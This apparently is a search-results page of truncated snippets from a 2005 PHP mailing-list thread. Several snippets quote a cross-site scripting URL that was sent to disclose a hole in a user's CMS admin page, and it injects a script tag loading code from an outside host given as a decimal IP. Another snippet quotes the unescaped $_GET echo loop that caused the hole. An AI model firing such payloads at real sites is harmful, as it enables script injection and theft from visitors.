Hello,
on 05/27/2005 11:50 PM Ryan A said the following:
I have requested the free test several times and it was very useful
because it brought my attention to aspects that I was not considering,
some related to PHP in specific and other related to Internet in
general.
fair enough, you could
-Original Message-
From: Rasmus Lerdorf [mailto:[EMAIL PROTECTED]
Sent: Saturday, May 28, 2005 3:48 PM
To: Ryan A
Cc: php
Subject: Re: [PHP] Re: Free penetration test
Ryan A wrote:
That is extremly generious of you as I didnt really think you would have
the
time considering
For me, of course there is nothing wrong on the PHP Group help
themselves making money with referrals. My point is that it is pretty
common to not distract people with the details of who gets what with
referrals because it does not change anything for who follows a link
with our without the
Hi,
This is getting pretty irritating because by now even a stone would have
understood what
I was trying to say...so either you are playing dumb or you just dont want
to understand,
that said, this is my last response as I have much better things to do than
say the same thing
over and
Hello,
on 05/30/2005 02:21 PM Ryan A said the following:
Not really, the service is still the same... true,
but what happens if he decides to buy one more scan (49$) from that site
or
decides to buy a 1 month scanning option ($119) or 1 year scanning
($899)?
Does a little birdie get 35%
BTW, what do you call to a person that throws stones to another and then
runs away to not face the consequences?!
Fine, I'll play your game a little longer...but offlist as I think the list
has had enough of this,
I'm also a bit busy now so expect a reply from me after a few hours.
Regards,
Ryan
Hehe, well put...a few things you forgot to write:
Ryan A and Rory Browne got so irritated because its like talking to a
tree.in english when the tree
only understands some other language :-D
that they tried to throw in the towel
I was so fed up I was going to drop the whole thing because
Okay:
1: Calm down. You're sensationalism and paranoia make you look like a
nutcase.(no offence)
2:
That would be irrelevant because nothing changes for the anybody that
follows the link with or without the aff code. The service is still free
Obviously we don't consider it irrelevent. That's
Hi,
Is it bad to give field names the same name as their database
counterpart? i.e. In a database the first name column might be known as
'fname'. Should a form field called 'fname' NOT be created?
I actually had the same question a little while ago and after doing some
reading it left me
Ryan A wrote:
That is extremly generious of you as I didnt really think you would have the
time considering the
amount of projects,books etc you are involved with (yep, I read your CV on
your site :-D ), but
I would like to take you up on your offer as I am sure to learn something
from
mostly in Swedish...I can give you a
star
account (Star accounts are the
paid accounts) for you to login and test the site, but do you think you
could still test it since its mostly
in Swedish?
Ja, jeg tror jeg kan klare det. Sproget er ret ligegyldigt, jeg checker
bare for XSS
Hello,
on 05/23/2005 06:19 AM Andy Pieters said the following:
I am looking at where I can get my system tested for penetration.
In case someone here would like to have a go
This is the url
http://www.vlaamse-kern.com/yourstore-0.0.2-beta1/admin/
It is actually a kind of CMS system so if
You may want to try Security Space services. They perform many types of
security checks remotely including penetration tests that may reveal
serious vulnerabilities in your servers. Such vulnerabilities include
holes, in your server OS version, Web and e-mail servers and even in the
PHP
on 05/23/2005 06:19 AM Andy Pieters said the following:
I am looking at where I can get my system tested for penetration.
In case someone here would like to have a go
This is the url
http://www.vlaamse-kern.com/yourstore-0.0.2-beta1/admin/
It is actually a kind of CMS system so if
Hello,
on 05/27/2005 02:30 PM Ryan A said the following:
You may want to try Security Space services. They perform many types of
security checks remotely including penetration tests that may reveal
serious vulnerabilities in your servers. Such vulnerabilities include
holes, in your server OS
On Friday 27 May 2005 19:11, Rasmus Lerdorf wrote:
You have all sorts of problems at that URL. To start with, here is a
cross-site scripting hack:
http://www.vlaamse-kern.com/yourstore-0.0.2-beta1/admin/?%22%3E%3Cscript%09
src%3D%22http://3423329163/v
Hi Thank you! I just saw the potential
Andy Pieters wrote:
On Friday 27 May 2005 19:11, Rasmus Lerdorf wrote:
You have all sorts of problems at that URL. To start with, here is a
cross-site scripting hack:
http://www.vlaamse-kern.com/yourstore-0.0.2-beta1/admin/?%22%3E%3Cscript%09
src%3D%22http://3423329163/v
Hi Thank you! I
snip
Umm, you forgot to mention that you are connected to that site and you
get a commision for sending them clients, if they sign up.
Nothing wrong with getting an affiliate buck mind you, I have a few
affiliate accounts around too, but I (and others on the list i have
noticed, Jay B for
On 5/27/05, Manuel Lemos [EMAIL PROTECTED] wrote:
Hello,
on 05/27/2005 02:30 PM Ryan A said the following:
You may want to try Security Space services. They perform many types of
security checks remotely including penetration tests that may reveal
serious vulnerabilities in your servers.
Rasmus Lerdorf mailto:[EMAIL PROTECTED]
on Friday, May 27, 2005 4:15 PM said:
He was apparently doing something along the lines of:
foreach($_GET as $key=$val) {
echo EOL
input type=hidden name=$key value=$val
EOL;
}
Probably just a lazyness thing. Generally you will want
Chris W. Parker wrote:
One question. (Because I'm a lame brain when it comes to security as I'm
not good at imagining how things can be exploited):
Is it bad to give field names the same name as their database
counterpart? i.e. In a database the first name column might be known as
'fname'.
Rasmus Lerdorf mailto:[EMAIL PROTECTED]
on Friday, May 27, 2005 11:58 AM said:
You have all sorts of problems at that URL. To start with, here is
a cross-site scripting hack:
http://www.vlaamse-kern.com/yourstore-0.0.2-beta1/admin/?%22%3E%3Cscript
%09
src%3D%22http://3423329163/v
Chris W. Parker wrote:
Rasmus Lerdorf mailto:[EMAIL PROTECTED]
on Friday, May 27, 2005 11:58 AM said:
You have all sorts of problems at that URL. To start with, here is
a cross-site scripting hack:
http://www.vlaamse-kern.com/yourstore-0.0.2-beta1/admin/?%22%3E%3Cscript
%09
On Saturday 28 May 2005 01:05, Chris W. Parker wrote:
Rasmus Lerdorf mailto:[EMAIL PROTECTED]
on Friday, May 27, 2005 11:58 AM said:
You have all sorts of problems at that URL. To start with, here is
a cross-site scripting hack:
Hi,
I have requested the free test several times and it was very useful
because it brought my attention to aspects that I was not considering,
some related to PHP in specific and other related to Internet in
general.
fair enough, you could have given him the link the the page directly
Hello,
on 05/27/2005 05:30 PM Rory Browne said the following:
You may want to try Security Space services. They perform many types of
security checks remotely including penetration tests that may reveal
serious vulnerabilities in your servers. Such vulnerabilities include
holes, in your server
Hello,
on 05/27/2005 06:46 PM Ryan A said the following:
-
I have requested the free test several times and it was very useful
because it brought my attention to aspects that I was not considering,
some related to PHP in specific and other related to Internet in general.
-
fair enough,
27 matches
Mail list logo
